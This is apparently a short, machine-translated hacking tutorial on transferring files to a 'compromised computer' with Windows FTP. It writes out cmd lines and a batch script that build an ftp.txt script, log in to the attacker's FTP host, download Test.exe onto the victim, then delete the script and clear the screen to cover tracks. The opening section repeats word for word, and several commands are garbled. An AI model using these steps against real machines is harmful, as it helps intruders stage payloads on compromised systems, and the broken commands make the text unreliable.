How do you use the command to upload files on your computer to the compromised computer? There are many ways. Using FTP is a good choice. Methods are as follows
echo Open your Ftpip >ftp.txt
echo User >>ftp.txt
Echo Password>>ftp.txt
echo Get Test.exe >>ftp.txt
echo Bye >>ftp.txt
Ftp-s:ftp.txt
Delftp.txt
So we can download the test.exe.
You can also do a batch process
@echo off
echo Open your Ftpip >ftp.txt
echo User >>ftp.txt
Echo Password>>ftp.txt
echo Get Test.exe >>ftp.txt
echo Bye >>ftp.txt
Ftp-s:ftp.txt
Delftp.txt
@cls
How do you use the command to upload files on your computer to the compromised computer? There are many ways. Using FTP is a good choice. Methods are as follows
echo Open your Ftpip >ftp.txt
echo User >>ftp.txt
Echo Password>>ftp.txt
echo Get Test.exe >>ftp.txt
echo Bye >>ftp.txt
Ftp-s:ftp.txt
Delftp.txt
So we can download the test.exe.
You can also do a batch process
@echo off
echo Open your Ftpip >ftp.txt
echo User >>ftp.txt
Echo Password>>ftp.txt
echo Get Test.exe >>ftp.txt
echo Bye >>ftp.txt
Ftp-s:ftp.txt
Delftp.txt
@cls
—————————————————————————————— I'm a gorgeous split-line ———————————————————————————
The previous part is reproduced, in fact, the use of the FTP command can read the function of the instruction, the actual Ftp.txt file content is as follows (the Chinese part needs to be replaced):
Open your FTP address
Your user name
Your password.
Bin
Get your file name
Bye
Upload and download via FTP command